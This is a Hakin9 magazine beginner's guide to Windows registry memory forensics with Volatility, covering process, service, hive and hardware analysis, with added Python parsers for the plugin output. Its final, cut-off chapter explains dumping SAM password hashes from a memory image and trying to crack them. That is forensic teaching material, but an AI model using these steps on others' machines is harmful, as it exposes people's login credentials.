Dear Hakin9 Readers!

We give you the new Hakin9 issue about practical protection. Less theory, more practice!

What will you find here?

We recommend the article by Mr Mirko Raimondi about Voice over Internet Protocol hacking.
VoIP is becoming a more and more popular way of voice communication, replacing the
analog-signal telephones. New technologies, new threats!

And have you ever been interested in steganography? Mr Sarang shows us how to encode files
so that they look like a different file than they really are. This is not just a trick: it is better to know
that hackers can send a hidden Trojan in a file that looks like an image, video, message...

We also have the pleasure of publishing an article by Mr Thanglalson Gangte, who took 2nd place
in our Best IT Blog Challenge! Have you heard about Pretty Good Privacy? It's an asymmetric
encryption algorithm. Mr Gangte shares his findings about PGP, which lets us encrypt our emails.

This and much more in this Hakin9. We wish you good reading!


Hakin9 Magazine Team
Windows Registry Forensics (WRF) with Volatility Framework: Beginners Guide

by Kapil Soni 

This guide is especially for beginners who want to learn about Windows Registry Forensics.
Throughout this book you will learn how to do forensics on, and investigate, the Windows Registry.
Less Theory - More Practice.

Before starting the discussion about the tools used in Windows registry forensics, I would like to
explain what we are going to do and why.

In this book we are going to analyse memory in two ways, i.e. live memory forensics and dumped
memory forensics. We'll use two tools in this book for experimental purposes. Memory forensics is becoming
a very essential and useful task in digital forensics as well as in incident response.

When a system is infected and compromised by attacks or viruses, the investigator needs to perform analysis and
a forensic investigation of that particular system.

In this book I am going to demonstrate forensic analysis using dumped memory forensics.

Firstly I would like to explain what memory actually is and what it contains.

Memory contains a lot of important as well as confidential information about users and the system. We need
memory forensics to tackle memory-resident malware, criminal cases, intrusion analysis and so on.

All activities performed by an attacker, such as any malicious or harmful activity, can be analysed by memory
forensics. These activities are stored in the form of logs or data. Sometimes such data is also encrypted, so
we need to perform the analysis according to the nature of the data.

Let's begin our demonstration with the tools.

DumpIt

DumpIt is a free memory dumping tool for Windows by MoonSols that can dump all the memory in just one
click. DumpIt is a very powerful and useful tool for dumping memory on the Windows platform. DumpIt is a fusion
of two tools, Win32 and Win64, combined into one executable.


Figure 1. DumpIt Memory Dumper (console screenshot of DumpIt v1.3.2.20110401, "One click memory
memory dumper", Copyright (c) 2007-2011 Matthieu Suiche and 2010-2011 MoonSols; it reports
"Address space size: 205520896 bytes" and "Free space size: 1780297728 bytes", a destination file
on E:\ named after the host name and date (\??\E:\WIN-...-20110723...), asks "Are you sure you want
to continue? [y/n]" and, after "y", prints "+ Processing... Success.")




Secure Coding 


Note

If you have any problem with installation and usage, I recommend watching this video tutorial on
how to use DumpIt: http://www.youtube.com/watch?v=SEs4ZAolED0.

Volatility Framework

The Volatility framework integrates almost all the digital forensics tools we need within it. The Volatility Framework is a
completely open collection of tools, implemented in Python under the GNU General Public License, for the
extraction of digital artifacts from volatile memory (RAM) samples. The extraction techniques are performed
completely independently of the system being investigated but offer unprecedented visibility into the runtime
state of the system. The framework is intended to introduce people to the techniques and complexities
associated with extracting digital artifacts from volatile memory samples and to provide a platform for further
work in this exciting area of research.

Volatility supports memory dumps from all major 32- and 64-bit Windows versions and service packs
including XP, 2003 Server, Vista, Server 2008, Server 2008 R2, and Seven. Whether your memory dump
is in raw format, a Microsoft crash dump, hibernation file, or virtual machine snapshot, Volatility is able to
work with it. It also supports Linux memory dumps in raw or LiME format and includes 35+ plugins
for analyzing 32- and 64-bit Linux kernels from 2.6.11 to 3.5.x and distributions such as Debian, Ubuntu,
OpenSuSE, Fedora, CentOS, and Mandrake. It supports 38 versions of Mac OSX memory dumps from 10.5
to 10.8.3 Mountain Lion, both 32- and 64-bit. Android phones with ARM processors are also supported.
Support for Windows 8, 8.1, Server 2012, 2012 R2, and OSX 10.9 (Mavericks) is either already in svn or
just around the corner, so stay tuned for the next release. Some advanced features of the Volatility Framework are
the tools it provides for memory malware analysis and Android memory analysis.

Chapter 2 - Basics of Memory Image (Dumped)

Dumped memory contains a lot of information which is very useful from a forensic perspective.

First of all we have to know which memory dump we are going to analyse, whether it is of Windows
XP or Windows 7, because both have a different architecture. Some plugins of Volatility will work
on Windows XP but not on Windows 7, and vice versa. Also make sure you have the Volatility Framework
standalone and a dumped memory file for forensics.

So let's start some practical things.

Image Information

In this section we will see how to check the basic information contained in an image (a dumped file of
Windows XP). I'll use the Volatility Framework to perform the analysis of the image. So I have the "Volatility Framework
Standalone Version" for Windows, and a dumped memory image of Windows XP.

To get the image information from the image, use the "imageinfo" plugin in your command prompt as follows:

Volatility.exe -f WinXP.raw imageinfo 


Where:

Volatility.exe - the Volatility Framework executable that you can download from the internet.

-f - file location/file path of the memory image.

WinXP.raw - the dumped Windows memory image.

imageinfo - the Volatility Framework plugin that checks image information.
Figure 2. Image Information Gathering

After running the "imageinfo" plugin you can see two profiles suggested by it. This means the dumped image may
match the WinXPSP2x86 or the WinXPSP3x86 profile. I know my profile is WinXPSP2x86, so I'll use it.

You can figure out the exact profile of the dumped image with the "kdbgscan" plugin; just use it instead of imageinfo and
it will show you other interesting information as well.

Process Analysis

Process analysis is another very important part of memory forensics and investigation, because processes
contain a lot of secrets and useful information from a forensic perspective. Take the example of memory
malware analysis of malware such as Zeus, Lagma, Coreflood etc. To analyse such types of malware,
process analysis plays an important role: by analysing processes we can find out which malware is present
in memory. But let's come back to Windows registry forensics; we will discuss memory
malware analysis in my next book.

To scan processes present in dumped memory image following plugin is used: 

Volatility.exe -f WinXP.raw psscan 


Where, 

psscan - the process scan plugin, which prints all the processes that were running on the system when the image was created.


D:\MEMORY>Volatility.exe -f WinXP.raw psscan
Volatility Foundation Volatility Framework 2.3.1
Offset(P)  Name             PID  PPID PDB        Time created
0x039c3da0 svchost.exe      1448  680 0x09b401a0 2013-12-28 08:25:59 UTC+0000
0x039c8020 rundll32.exe     1380 1508 0x09b402c0 2013-12-28 08:26:36 UTC+0000
0x039c8ae8 alg.exe          1296  680 0x09b402a0 2013-12-28 08:26:35 UTC+0000
0x039cf528 wmiprvse.exe      684  920 0x09b40340 2013-12-28 08:30:48 UTC+0000
0x03a68020 csrss.exe         612  372 0x09b40040 2013-12-28 08:25:45 UTC+0000
0x03a77c10 explorer.exe     1508 1428 0x09b401c0 2013-12-28 08:25:59 UTC+0000
0x03b55c10 imapi.exe        1896  680 0x09b40100 2013-12-28 08:26:38 UTC+0000
0x03ba3af8 TPAutoConnect.e  1716  960 0x09b40300 2013-12-28 08:26:37 UTC+0000
0x03bac020 vmtoolsd.exe      452  680 0x09b40200 2013-12-28 08:26:28 UTC+0000
0x03bf17b8 wuauclt.exe       532 1152 0x09b40320 2013-12-28 08:28:01 UTC+0000
0x03bfc1e0 DumpIt.exe       1764 1508 0x09b40240 2013-12-28 08:35:02 UTC+0000
0x03c4c020 smss.exe          372    4 0x09b40020 2013-12-28 08:25:42 UTC+0000
0x03c4ea80 spoolsv.exe      1696  680 0x09b401e0 2013-12-28 08:26:01 UTC+0000
0x03c51020 services.exe      680  636 0x09b40080 2013-12-28 08:25:48 UTC+0000
0x03ce2da0 svchost.exe       172  680 0x09b40180 2013-12-28 08:26:19 UTC+0000

Figure 3. Process Scanning


In the above image you can clearly see that the psscan plugin prints out all the processes with their
corresponding process IDs, parent process IDs and offsets. (These offsets and process IDs are used in malware analysis.)
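Reading a psscan listing by eye works for fifteen rows, but the question an investigator actually asks of it is "does every process have a plausible parent?" The following is an added example (not code from the article or from the Volatility project) that parses the psscan text layout shown in Figure 3 and reports processes whose parent PID does not appear in the scan. The sample input is a constructed subset of the Figure 3 rows; note that it deliberately omits the System process (PID 4), and that on Windows XP explorer.exe's parent (userinit.exe) and services.exe's parent (winlogon.exe) have normally exited or are hidden, so a missing parent is a lead to check, not proof of malware.

```python
"""Parse Volatility 2 psscan output and check parent/child relationships.

Added example (not from the original article or the Volatility project).
PSSCAN_OUTPUT is a constructed subset of the rows shown in Figure 3.
"""
import re
from dataclasses import dataclass

PSSCAN_OUTPUT = """\
Volatility Foundation Volatility Framework 2.3.1
Offset(P)  Name             PID  PPID PDB        Time created
0x039c3da0 svchost.exe      1448  680 0x09b401a0 2013-12-28 08:25:59 UTC+0000
0x039c8020 rundll32.exe     1380 1508 0x09b402c0 2013-12-28 08:26:36 UTC+0000
0x03a68020 csrss.exe         612  372 0x09b40040 2013-12-28 08:25:45 UTC+0000
0x03a77c10 explorer.exe     1508 1428 0x09b401c0 2013-12-28 08:25:59 UTC+0000
0x03bfc1e0 DumpIt.exe       1764 1508 0x09b40240 2013-12-28 08:35:02 UTC+0000
0x03c4c020 smss.exe          372    4 0x09b40020 2013-12-28 08:25:42 UTC+0000
0x03c51020 services.exe      680  636 0x09b40080 2013-12-28 08:25:48 UTC+0000
"""

# One psscan row: physical offset, image name, PID, PPID, page directory base, creation time.
ROW_RE = re.compile(
    r"^(?P<offset>0x[0-9a-f]+)\s+(?P<name>\S+)\s+(?P<pid>\d+)\s+(?P<ppid>\d+)\s+"
    r"(?P<pdb>0x[0-9a-f]+)\s+(?P<created>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2})",
    re.I,
)


@dataclass
class Proc:
    offset: int
    name: str
    pid: int
    ppid: int
    created: str


def parse_psscan(text):
    """Return a Proc for every row that matches the psscan table layout; header and banner lines are skipped."""
    procs = []
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            procs.append(Proc(int(m["offset"], 16), m["name"], int(m["pid"]), int(m["ppid"]), m["created"]))
    return procs


def orphan_parents(procs):
    """Return (child name, ppid) pairs whose parent PID is absent from the scan.

    PPID 0 is the idle process and is never reported as missing. Every pair returned
    is something to explain: an exited parent (normal for explorer.exe on XP), a row
    cut off from the sample, or a process that was started by something no longer present.
    """
    known = {p.pid for p in procs}
    return [(p.name, p.ppid) for p in procs if p.ppid not in known and p.ppid != 0]


def children_of(procs, pid):
    """Names of the processes whose parent is `pid`, sorted for stable comparison."""
    return sorted(p.name for p in procs if p.ppid == pid)


if __name__ == "__main__":
    procs = parse_psscan(PSSCAN_OUTPUT)
    for name, ppid in orphan_parents(procs):
        print(f"{name}: parent PID {ppid} not found in scan")
    print("children of explorer.exe (1508):", children_of(procs, 1508))
```

Because the regex anchors on the hexadecimal offset at the start of the row, the banner line and column header fall through harmlessly, which is the usual trick for scraping Volatility 2's fixed-width tables.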
Services Analysis

Services analysis is yet another important analysis for the investigator from a forensic perspective. With services
analysis the investigator easily learns which services were running the last time the system was up and which services
were not running; you can even clearly see the process ID of every service. Sometimes the investigator detects
unwanted services that were running on the system which are not related to the system or its default services; they may
have been activated by a Trojan, a RAT, or another malicious program.


Offset: 0x6ea600
Order: 243
Process ID: 904
Service Name: VMware Physical Disk Helper Service
Display Name: VMware Physical Disk Helper Service
Service Type: SERVICE_WIN32_OWN_PROCESS
Service State: SERVICE_RUNNING
Binary Path: "C:\Program Files\VMware\VMware Tools\vmacthlp.exe"

Offset: 0x6ea6c8
Order: 244
Process ID: -
Service Name: vmxnet
Display Name: VMware Ethernet Adapter Driver
Service Type: SERVICE_KERNEL_DRIVER
Service State: SERVICE_STOPPED
Binary Path: -

Figure 4. Scanned Process Snippet

In the above image you can see that after the service scan (svcscan) we get a brief description of each service and can easily
tell whether it is started or stopped. Analysis of these services is very important because the
investigator can find malicious activity or evidence through it.

In the image you can see the offset of each service record with its corresponding order number and process ID,
as well as the service name, the display name and the service type, which shows what kind of
service it is (a user-mode process or a kernel driver). Then you can see the service state, which shows whether the service
was running or not; if it indicates stopped, the service was stopped on the system. Finally you can see the path of the
binary from which the service executes.
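The record-per-block layout of svcscan is easy to parse, and once parsed the "unwanted service" check the text describes can be automated: flag any running Win32 service whose binary lives outside the Windows and Program Files directories. The example below is added here and is not code from the article or the Volatility project; its sample input repeats the two records of Figure 4 and adds a third, constructed record with a binary in a user's Temp directory so that the check has something to find. The trusted-prefix list and the Windows XP path layout are assumptions you would adjust per image.

```python
"""Parse Volatility 2 svcscan output and flag running services with unusual binary paths.

Added example, not from the article or the Volatility project. The first two records
below are those of Figure 4; the third (WinHelp32) is constructed test data.
"""
SVCSCAN_OUTPUT = r"""
Offset: 0x6ea600
Order: 243
Process ID: 904
Service Name: VMware Physical Disk Helper Service
Display Name: VMware Physical Disk Helper Service
Service Type: SERVICE_WIN32_OWN_PROCESS
Service State: SERVICE_RUNNING
Binary Path: "C:\Program Files\VMware\VMware Tools\vmacthlp.exe"

Offset: 0x6ea6c8
Order: 244
Process ID: -
Service Name: vmxnet
Display Name: VMware Ethernet Adapter Driver
Service Type: SERVICE_KERNEL_DRIVER
Service State: SERVICE_STOPPED
Binary Path: -

Offset: 0x6ea790
Order: 245
Process ID: 1312
Service Name: WinHelp32
Display Name: Windows Helper
Service Type: SERVICE_WIN32_OWN_PROCESS
Service State: SERVICE_RUNNING
Binary Path: C:\Documents and Settings\Administrator\Local Settings\Temp\winhlp32.exe
"""

# Directories where service binaries are expected on an XP image (assumption; tune per system).
TRUSTED_PREFIXES = ("c:\\windows\\", "c:\\program files\\")


def parse_svcscan(text):
    """Split the output into records (blank-line separated) of 'Field: value' pairs."""
    records, cur = [], {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            if cur:
                records.append(cur)
                cur = {}
            continue
        key, _, val = line.partition(":")  # the first colon separates field from value
        cur[key.strip()] = val.strip()
    if cur:
        records.append(cur)
    return records


def normalize_path(p):
    """Lower-case, unquote, and drop arguments such as '-k netsvcs' after the executable."""
    p = p.strip().strip('"').lower()
    if ".exe" in p:
        p = p[: p.index(".exe") + 4]
    return p


def running_outside_trusted_dirs(records):
    """(name, pid, path) for running Win32 services whose image is not under a trusted directory.

    Kernel drivers are skipped: their paths are relative to the system root and need a different check.
    """
    hits = []
    for r in records:
        if r.get("Service State") != "SERVICE_RUNNING":
            continue
        if not r.get("Service Type", "").startswith("SERVICE_WIN32"):
            continue
        path = normalize_path(r.get("Binary Path", ""))
        if path and not path.startswith(TRUSTED_PREFIXES):
            hits.append((r["Service Name"], r["Process ID"], path))
    return hits


def state_counts(records):
    """How many services were in each state when the image was taken."""
    counts = {}
    for r in records:
        state = r.get("Service State", "?")
        counts[state] = counts.get(state, 0) + 1
    return counts


if __name__ == "__main__":
    recs = parse_svcscan(SVCSCAN_OUTPUT)
    print(state_counts(recs))
    for name, pid, path in running_outside_trusted_dirs(recs):
        print(f"suspicious: {name} (PID {pid}) -> {path}")
```

The PID returned for a hit is the link back to psscan: a service flagged here should have a matching process row, and the process's own offset and parent can then be examined.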

Chapter 3 - Registry Basics

The registry is one of the most important parts of the Windows operating system. The registry is managed in hierarchical
form and stores the configuration settings of users and the system on Windows. The kernel,
device drivers, services, the SAM, the user interface and third-party applications can all make use of the registry.
The registry also provides a means to access counters for profiling system performance.


Hives

The registry is managed in hierarchical form in Windows to keep settings and data organised.

The Windows operating system has several different hives for managing settings, such as Machine, Root, Security, User,
and Default. Hives are the root directories that store subdirectories called keys. In other words, the registry is an integrated
hierarchical database whose branches are actually stored in a number of disk files called hives.

Some hives are volatile and are not stored on disk at all. An example of this is the hive of the branch starting at
HKLM\HARDWARE. This hive records information about the system hardware, and its entries are created each time
the system boots and performs hardware detection.

Not all hives are loaded at one time; when the system or an application needs a hive, it is loaded on demand.

*See your hive list by typing the "regedit" command in the Run box. The hive names are shown in the table below with their
corresponding abbreviation and purpose. Different hives contain different types of values or settings.
Table 1. HKEY specification

Name                 Abbreviation  Contents
HKEY_CLASSES_ROOT    HKCR          Information used by programs for file association and for sharing information.
HKEY_CURRENT_USER    HKCU          Settings and configuration for the current user.
HKEY_LOCAL_MACHINE   HKLM          Settings and configuration for all users.
HKEY_USERS           HKU           Settings and configuration for all users on the computer; the information in
                                   HKCU is copied from this hive when the user logs in.
HKEY_CURRENT_CONFIG  N/A           Hardware information about the PC's resources and configuration.


The Volatility Framework provides some plugins to gather information about hives. These plugins are used frequently
and are easy to use.

Hivelist

The hivelist plugin provides the list of all the hives that are present in memory. It shows the virtual address
(offset) of each registry hive in memory and the full path of the corresponding hive file.

Hivedump

To recursively list all subkeys in a hive, use the hivedump command and pass it the virtual address of the
desired hive.

Hivescan

This plugin finds the physical addresses of registry hives in the memory image. It
isn't generally useful by itself because hivelist does the same job better.

Keys Information

We already discussed keys in the hive section. To put it another way, take an example: Folder A contains
Folder B and Folder B contains Folder C; in the registry, Folder A is the hive, Folder B is the key and
Folder C is the subkey. Another way to say it: Hives > Keys > Subkeys, meaning a hive contains keys and keys
contain subkeys. In the image below you can clearly see what keys are.



Figure 5. Windows Registry Editor 
In the above image you can clearly see that the HKLM hive contains the HARDWARE, SAM, SECURITY and SOFTWARE
keys, and these keys contain subkeys as shown in the image.

Navigating Keys and Subkeys in Registry 

The Volatility Framework provides a very useful and easy way to navigate keys and subkeys in memory: the
"printkey" plugin. printkey displays the subkeys, values, data, and data types contained within a
specified registry key. Let's take an example: if you want to print all the keys available in the
SYSTEM hive, run:

Volatility.exe -f WinXP.raw --profile=WinXPSP2x86 printkey -o hive_offset

In place of hive_offset you have to put the offset/virtual address of the hive, which you can find with the
help of the hivelist plugin. After this you will get all the keys that the hive contains. Going deeper,
if you want to list the subkeys under a key, you have to use -K followed by the key name. For example:

Volatility.exe -f WinXP.raw --profile=WinXPSP2x86 printkey -o hive_offset -K Key_Name

Some keys and subkeys contain values that store configuration settings of the system, users and network.
These values may be in encrypted or binary form, so they cannot always be easily understood. The image below shows an
example of locating keys and subkeys in the Windows registry.


D:\MEMORY>Volatility.exe -f WinXP.raw --profile=WinXPSP2x86 printkey -o 0xe1035b60
Volatility Foundation Volatility Framework 2.3.1
Legend: (S) = Stable   (V) = Volatile

Registry: User Specified
Key name: $$$PROTO.HIV (S)
Subkeys:
  (S) ControlSet001
  (S) ControlSet002
  (S) LastKnownGoodRecovery
  (S) MountedDevices
  (S) Select
  (S) Setup
  (S) WPA
  (V) CurrentControlSet
Values:

D:\MEMORY>Volatility.exe -f WinXP.raw --profile=WinXPSP2x86 printkey -o 0xe1035b60 -K ControlSet001
Volatility Foundation Volatility Framework 2.3.1
Legend: (S) = Stable   (V) = Volatile

Registry: User Specified
Key name: ControlSet001 (S)
Subkeys:
  (S) Control
  (S) Enum
  (S) Hardware Profiles
  (S) Services

Figure 6. Uses of PrintKey Plugin (the "Last updated" timestamps are unreadable in the scan)


Chapter 4 - Hardware Information

Gathering information about the hardware of a Windows system from the registry is a good idea.

Windows stores hardware and BIOS information in the registry, which helps the investigator find information
about the BIOS and the hardware connected to the system. Under the HKLM hive, the HARDWARE
key contains information about hardware and BIOS. I have a dumped image of Windows 7, so I'll use this
dumped image to collect information about hardware and BIOS.


CPU Identification


The Windows registry is the perfect way to identify the central processing unit. In this part we will gather information
about the CPU. The registry stores value data both in plain and in binary/encoded form. With the help of the hivelist
plugin you will get the virtual address/offset of the HARDWARE hive under HKLM, as shown in the figure below.
D:\MEMORY>Volatility.exe -f Windows7.raw --profile=Win7SP1x86 hivelist
Volatility Foundation Volatility Framework 2.3.1
Virtual    Physical   Name
0xb62ad5e0 0x200?45e0 \??\C:\System Volume Information\Syscache.hve
0xb7a922c8 0x1dfd42c8 \??\C:\Users\Ajay Mehra\AppData\Local\Microsoft\Windows\UsrClass.dat
0xb86359d0 0x1be769d0 \??\C:\Users\Ajay Mehra\ntuser.dat
0x8cc0c008 0x62a8f008 [no name]
0x8cc1c008 0x52ece008 \REGISTRY\MACHINE\SYSTEM
0x8cc50008 0x4f?02000 \REGISTRY\MACHINE\HARDWARE
0x8f779008 0x3d?a2008 \??\C:\Windows\ServiceProfiles\NetworkService\NTUSER.DAT
0x91230490 0x3deba490 \??\C:\Windows\ServiceProfiles\LocalService\NTUSER.DAT
0x98158398 0x12900398 \SystemRoot\System32\Config\SAM
0x981589d0 0x129009d0 \SystemRoot\System32\Config\SECURITY
0x98fe?008 0x87900008 \SystemRoot\System32\Config\DEFAULT
0x981e9008 0x0b600008 \SystemRoot\System32\Config\SOFTWARE
0xa1fd8008 0x2500f00? \Device\HarddiskVolume1\Boot\BCD

Figure 7. Hives list with hivelist plugin ("?" marks a hex digit unreadable in the scan)


Copy the virtual address of \REGISTRY\MACHINE\HARDWARE and navigate it with the help of the "printkey" plugin; -o is used
for the offset/virtual address.


D:\MEMORY>Volatility.exe -f Windows7.raw --profile=Win7SP1x86 printkey -o 0x8cc50008
Volatility Foundation Volatility Framework 2.3.1
Legend: (S) = Stable   (V) = Volatile

Registry: User Specified
Key name: HARDWARE (S)
Last updated: 2014-01-18 09:26:43 UTC+0000
Subkeys:
  (S) ACPI
  (S) DESCRIPTION
  (S) DEVICEMAP
  (V) RESOURCEMAP

Figure 8. Locating Keys and Subkeys with PrintKey


In the above image you can see the subkeys managed under the HARDWARE key. To gather
information about hardware and BIOS you have to navigate to the DESCRIPTION\System subkey as shown in the
image below.



Figure 9. Locating Hives for Hardware Information


As you can see in the above image, we get a little information about the system from the registry. At the
bottom of the image you can see SystemBiosDate, SystemBiosVersion, Identifier, BootArchitecture and
other information. Now suppose we want to gather more information about the CPU; then we navigate to
"CentralProcessor". And if we want to gather more information about hardware and BIOS, we have to
navigate to "BIOS".

First of all we'll navigate to the CentralProcessor subkey to gather information about the CPU and its vendor. You can
navigate to it with the following command:


Volatility.exe -f Windows7.raw --profile=Win7SP1x86 printkey -o HKLM_Virtual -K DESCRIPTION\System\CentralProcessor\0


After executing this command you can clearly see the architecture of the OS, the processor name, the vendor
identification and the frequency of the processor. In my case the processor is an Intel Pentium B960 @ 2.20GHz, and in
MHz it was 2195 exactly.
Figure 10. Gather Information about CPU (console screenshot of printkey on
HKLM\HARDWARE\DESCRIPTION\System\CentralProcessor\0; the legible values are REG_SZ Identifier:
"x86 Family 6 Model 42 Stepping 7", REG_SZ ProcessorNameString: "Intel(R) Pentium(R) CPU B960 @ 2.20GHz",
REG_SZ VendorIdentifier: "GenuineIntel", REG_DWORD FeatureSet, REG_DWORD ~MHz, REG_DWORD Update Status,
REG_DWORD Platform ID, REG_BINARY Component Information, Update Signature and Previous Update Signature,
and REG_FULL_RESOURCE_DESCRIPTOR Configuration Data shown as hex dumps)
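printkey prints each value as a type, a name, a stable/volatile flag and the data, with REG_BINARY and resource-descriptor data continued on hex-dump lines underneath. Pulling the CPU fields out of that by hand is error-prone, so here is an added example (not code from the article or the Volatility project) that parses the Values section into a dictionary, gathering multi-line hex dumps back into bytes. The sample output is constructed in printkey's layout from the CentralProcessor\0 values this chapter reports (Identifier, ProcessorNameString, VendorIdentifier, ~MHz); the FeatureSet number and the binary contents are filler.

```python
r"""Parse the Values section of Volatility 2 printkey output into Python values.

Added example, not from the article or the Volatility project. PRINTKEY_OUTPUT is
constructed in printkey's layout from the CentralProcessor\0 values the chapter
reports; FeatureSet and the binary blobs are made-up filler.
"""
import re

PRINTKEY_OUTPUT = r"""
Registry: User Specified
Key name: 0 (S)
Last updated: 2014-01-18 09:26:43 UTC+0000

Subkeys:

Values:
REG_BINARY    Component Information : (S)
0x00000000  00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00   ................
REG_SZ        Identifier      : (S) x86 Family 6 Model 42 Stepping 7
REG_FULL_RESOURCE_DESCRIPTOR Configuration Data : (S)
0x00000000  01 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00   ................
0x00000010  00 00 00 00 00 00 00 00                           ........
REG_SZ        ProcessorNameString : (S) Intel(R) Pentium(R) CPU B960 @ 2.20GHz
REG_SZ        VendorIdentifier : (S) GenuineIntel
REG_DWORD     FeatureSet      : (S) 3619997695
REG_DWORD     ~MHz            : (S) 2195
"""

# "<type>  <name> : (S|V) <data>"  -- data is empty for binary types, which continue below.
VALUE_RE = re.compile(r"^(REG_\w+)\s+(.+?)\s+:\s+\(([SV])\)\s*(.*)$")
# A hex-dump continuation line: offset, then 1..16 byte pairs, then the ASCII column.
HEX_RE = re.compile(r"^0x[0-9a-fA-F]{8}\s+((?:[0-9a-fA-F]{2} ){1,16})")
BINARY_TYPES = {"REG_BINARY", "REG_FULL_RESOURCE_DESCRIPTOR", "REG_RESOURCE_LIST"}


def parse_printkey_values(text):
    """Return {value name: (type, stable flag, data)}.

    REG_DWORD data becomes int; binary types become bytes assembled from the
    hex-dump lines that follow the value header; everything else stays a string.
    """
    values, current, in_values = {}, None, False
    for line in text.splitlines():
        if line.strip() == "Values:":
            in_values = True
            continue
        if not in_values:
            continue
        m = VALUE_RE.match(line)
        if m:
            vtype, name, flag, data = m.groups()
            if vtype == "REG_DWORD":
                data = int(data)
            elif vtype in BINARY_TYPES:
                data = bytearray()
            values[name] = [vtype, flag, data]
            current = name
            continue
        h = HEX_RE.match(line)
        if h and current and isinstance(values[current][2], bytearray):
            values[current][2] += bytes.fromhex(h.group(1).replace(" ", ""))
    return {k: (t, f, bytes(d) if isinstance(d, bytearray) else d) for k, (t, f, d) in values.items()}


def cpu_summary(values):
    """The four fields an investigator records for the CPU, taken from the parsed values."""
    return {
        "name": values["ProcessorNameString"][2],
        "vendor": values["VendorIdentifier"][2],
        "identifier": values["Identifier"][2],
        "mhz": values["~MHz"][2],
    }


if __name__ == "__main__":
    print(cpu_summary(parse_printkey_values(PRINTKEY_OUTPUT)))
```

The same parser works for any key printkey can display, which is why the binary types are kept as bytes rather than discarded: the BIOS and SCSI keys discussed next hold string values, but Configuration Data and the like are only usable if the dump lines are reassembled.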

Hardware and BIOS Identification

In this part we'll look at how to collect information about the compromised machine. When hardware or
a device driver is detected by Windows, it automatically creates the corresponding registry values in the HKLM
hive. This is a good way to collect information about the compromised machine.

Let's gather information about the compromised machine with the help of the dumped memory image. We just have
to navigate to the right key with the help of the printkey plugin:

Volatility.exe -f Windows7.raw --profile=Win7SP1x86 printkey -o HKLM_VirtualAddress -K DESCRIPTION\System\BIOS

After this command you will get important information about the hardware and BIOS used by the compromised
system, as shown in the image below.



Figure 11. Gather Information about Hardware and BIOS 


Note


Small Computer System Interface (SCSI) is a set of standards for physically connecting and transferring data
between computers and peripheral devices.

You can get some interesting information from here. You can find the BaseBoardManufacturer (i.e. the
notebook manufacturer), the BaseBoardProduct number and BaseBoardVersion, and for the BIOS the BIOS release
date, BIOS vendor and BIOS version. After that come the system family, manufacturer and
product name; you can even get the serial number and system version from here.


SCSI Devices

Now, if you want to identify or gather information about SCSI devices such as hard disks, DVD
writers and so on, the following command will help you locate the SCSI devices:

Volatility.exe -f Windows7.raw --profile=Win7SP1x86 printkey -o HKLM_VirtualAddress -K "DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0"


D:\MEMORY>Volatility.exe -f Windows7.raw --profile=Win7SP1x86 printkey -o 0x8cc50008 -K "DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0"
Volatility Foundation Volatility Framework 2.3.1
Legend: (S) = Stable   (V) = Volatile

Registry: User Specified
Key name: Scsi Bus 0 (V)
Subkeys:
  (V) Target Id 0
  (V) Target Id 1

Figure 12. Locating SCSI Devices


If any SCSI devices are connected to the system, you can find their entries here. In the above
image you can see two Target IDs, 0 and 1. If there are more Target IDs, more SCSI
devices were connected to the system. If you navigate into these Target IDs you will get the SCSI device
information, as shown in the images below:


D:\MEMORY>Volatility.exe -f Windows7.raw --profile=Win7SP1x86 printkey -o 0x8cc50008 -K "DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0"
Volatility Foundation Volatility Framework 2.3.1
Legend: (S) = Stable   (V) = Volatile

Registry: User Specified
Key name: Logical Unit Id 0 (V)
Last updated: 2014-01-18 09:26:44 UTC+0000
Subkeys:
Values:
REG_SZ  Identifier : (V) (disk model string, unreadable in the scan)
REG_SZ  Type       : (V) DiskPeripheral

Figure 13. Locate SCSI Devices with their Serial Number


D:\MEMORY>Volatility.exe -f Windows7.raw --profile=Win7SP1x86 printkey -o 0x8cc50008 -K "DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 1\Logical Unit Id 0"
Volatility Foundation Volatility Framework 2.3.1
Legend: (S) = Stable   (V) = Volatile

Registry: User Specified
Key name: Logical Unit Id 0 (V)
Last updated: 2014-01-18 09:26:54 UTC+0000
Subkeys:
Values:
REG_SZ  Identifier : (V) hp DVDRAM GT50N
REG_SZ  Type       : (V) CdRomPeripheral

Figure 14. Locating SCSI Devices 2

Chapter 5 - Hash Dumping and LSA Secrets

In this chapter you will learn about hashes and LSA Secrets and some dumping techniques using the Volatility
Framework.

Hash Dumping

The Windows SAM stores passwords in an unreadable format, i.e. in encrypted form or as hashes.
Windows users' passwords are stored in hash form in the SAM database. Windows uses two hash functions,
the LM hash and the NTLM hash, to secure users' passwords. When a user types a password to log in,
Windows converts the password into a hash and compares it with the hash stored in the SAM database. If the hashes
match, the user is logged in; if they do not match, Windows gives an "incorrect password" error.

The Volatility framework provides a very good and useful plugin to dump all the hashes from the SAM database.
The investigator can dump all the hashes and try to crack them, but cracking can take time. So what do we need in
order to dump the hashes?

The Volatility Framework provides a plugin named "hashdump" for dumping hashes, but we have to supply all the
parameters that are necessary for it. We need the virtual addresses (offsets) of the SAM hive and the
SYSTEM hive, which you can get easily with the help of the "hivelist" plugin.

In the image below I have highlighted SAM and SYSTEM with their corresponding virtual addresses or
offsets, because for hash dumping we have to pass them as parameters.
D:\MEMORY>Volatility.exe -f WinXPSP2.vmem --profile=WinXPSP2x86 hivelist
Volatility Foundation Volatility Framework 2.3.1
Virtual    Physical   Name
0xe1c49008 0x036dc008 \Device\HarddiskVolume1\Documents and Settings\LocalService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1c41b60 0x04010b60 \Device\HarddiskVolume1\Documents and Settings\LocalService\NTUSER.DAT
0xe1a39638 0x021eb638 \Device\HarddiskVolume1\Documents and Settings\NetworkService\Local Settings\Application Data\Microsoft\Windows\UsrClass.dat
0xe1a33008 0x01198008 \Device\HarddiskVolume1\Documents and Settings\NetworkService\NTUSER.DAT
0xe153ab60 0x06b7db60 \Device\HarddiskVolume1\WINDOWS\system32\config\software
